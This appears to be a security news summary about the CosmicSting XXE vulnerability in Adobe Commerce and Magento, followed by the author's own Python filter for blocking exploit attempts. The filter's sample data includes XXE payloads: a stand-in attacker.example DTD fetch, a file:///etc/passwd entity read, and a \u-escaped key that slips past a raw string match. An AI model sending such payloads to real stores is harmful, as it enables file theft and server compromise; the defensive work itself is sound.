June 20, 2024 at 05:32PM
A critical vulnerability, “CosmicSting” (CVE-2024-34102), affecting Adobe Commerce and Magento websites poses a major security threat. Although a security update is available, the majority of impacted sites remain unpatched, leaving them open to severe attacks. Administrators are urged to upgrade immediately to the fixed releases listed in the vendor advisory. For sites that cannot upgrade yet, temporary mitigations exist, but they block most rather than all attack variants and should be treated as a stopgap, not a replacement for the patch.
Key points:
1. A critical vulnerability named “CosmicSting” (CVE-2024-34102) impacts Adobe Commerce and Magento websites. It is an XML external entity injection (XXE) flaw reachable without authentication: an attacker can read arbitrary files from the server, including configuration files holding secrets, and the bug can be chained to remote code execution (RCE).
2. Approximately three out of four websites running the affected platforms have not yet patched against CosmicSting and remain exposed.
3. The vulnerability is rated critical (CVSS score: 9.8) and affects specific versions of Adobe Commerce, Adobe Commerce Extended Support, Magento Open Source, and the Adobe Commerce Webhooks Plugin; the affected version ranges are listed in the vendor advisory.
4. Adobe has released fixed versions for each affected product line and recommends applying them immediately; the exact version numbers are given in the vendor advisory.
5. Sansec advises switching Magento’s Content Security Policy to ‘Report-Only’ mode before upgrading, because the patched releases enforce CSP on checkout pages and can otherwise break checkout integrations. For sites that cannot upgrade immediately, Sansec also provides an “emergency fix” snippet that blocks most, but not all, CosmicSting attack variants until the upgrade is done.
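The emergency-fix idea in item 5, a filter that rejects attack payloads before they reach the web API, as an added example of my own; it is not Sansec’s or Adobe’s published code. It assumes, from my reading of the published fix, that the stopgap string-matches the raw POST body for dataIsURL (the SimpleXMLElement constructor argument the exploit chain relies on) and answers 503, and that the filter sees the body before the web API deserialises it. The JSON-decoded check, the DTD check and the log-only staging switch are my additions; the sample bodies are constructed, not captured traffic.

```python
"""
Request-body filter in the spirit of the CosmicSting emergency fix.

Added example, not Sansec's or Adobe's code. Assumptions (mine):
  * the published emergency fix matches the raw POST body for the string
    "dataIsURL", the SimpleXMLElement constructor argument the exploit
    chain relies on, and answers with HTTP 503;
  * this filter runs before the web API deserialises the body.
The JSON-decoded check, the DTD check and the log-only switch are my
additions to close the obvious gap in a raw string match.
"""
import json
import re

# Keys (compared case-insensitively) that a normal storefront/REST request
# has no reason to carry; "dataIsURL" is the one CosmicSting needs.
SUSPICIOUS_KEYS = {"dataisurl"}

# Inline DTD or entity declarations are the classic XXE signature; a REST
# endpoint expecting JSON or plain XML should never see them.
DTD_MARKER = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)


def _walk_keys(node):
    """Yield every object key in a decoded JSON document, recursively."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield key
            yield from _walk_keys(value)
    elif isinstance(node, list):
        for value in node:
            yield from _walk_keys(value)


def classify_body(raw: bytes):
    """Return a short reason if the body looks like a CosmicSting/XXE attempt,
    or None if it looks benign."""
    # 1. The cheap raw-string match a strpos()-style fix performs.
    if b"dataIsURL" in raw:
        return "raw body contains dataIsURL"
    # 2. Decode JSON first: a key written as "dataIs\u0055RL" passes the raw
    #    match but becomes "dataIsURL" once json_decode() runs on the server.
    try:
        document = json.loads(raw.decode("utf-8", errors="replace"))
    except ValueError:
        document = None
    if document is not None:
        for key in _walk_keys(document):
            if isinstance(key, str) and key.lower() in SUSPICIOUS_KEYS:
                return f"decoded JSON contains key {key!r}"
    # 3. Generic XXE marker for XML bodies.
    if DTD_MARKER.search(raw):
        return "body contains a DTD/entity declaration"
    return None


def filter_request(raw: bytes, log_only: bool = True) -> dict:
    """Decide what to do with one request body.

    log_only=True  -> record the hit but let the request through (staging,
                      so false positives surface before anything is blocked)
    log_only=False -> answer 503, as the emergency fix does
    """
    reason = classify_body(raw)
    if reason is None:
        return {"action": "allow", "status": 200, "reason": None}
    if log_only:
        return {"action": "report", "status": 200, "reason": reason}
    return {"action": "block", "status": 503, "reason": reason}


# Constructed sample bodies (not captured traffic); the attack shapes are
# simplified to the one argument the filter keys on.
SAMPLES = {
    "benign_cart": b'{"address":{"street":["1 Main St"],"postcode":"10001"}}',
    "plain_attack": b'{"q":{"data":"http://attacker.example/x.dtd","dataIsURL":true}}',
    "escaped_attack": b'{"q":{"data":"http://attacker.example/x.dtd","dataIs\\u0055RL":true}}',
    "xml_xxe": b'<?xml version="1.0"?><!DOCTYPE a [<!ENTITY f SYSTEM "file:///etc/passwd">]><a>&f;</a>',
}


def triage(samples: dict, log_only: bool) -> dict:
    """Run the filter over a batch of bodies; returns {name: action}."""
    return {name: filter_request(body, log_only)["action"]
            for name, body in samples.items()}


if __name__ == "__main__":
    for mode in (True, False):
        print("log_only=%s" % mode, triage(SAMPLES, log_only=mode))
```

The escaped_attack sample is the point of the decoded check: a raw strpos()-style match never sees the literal string, but the server’s JSON decoder turns the \u escape back into the key the exploit needs. Run the filter with log_only=True on production traffic first and only switch to blocking once the hits are all genuine; either way it buys time and does not replace the vendor patch.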
It is crucial to communicate the severity of this vulnerability to the relevant stakeholders promptly and to make sure the patch, or at least the temporary mitigation, is applied without delay. Where the emergency fix is used, it should be rolled out together with a firm date for the full upgrade, since it is a stopgap rather than a complete fix. Because unpatched sites have been exposed since the update was published, patching should be followed by a check for signs of prior compromise.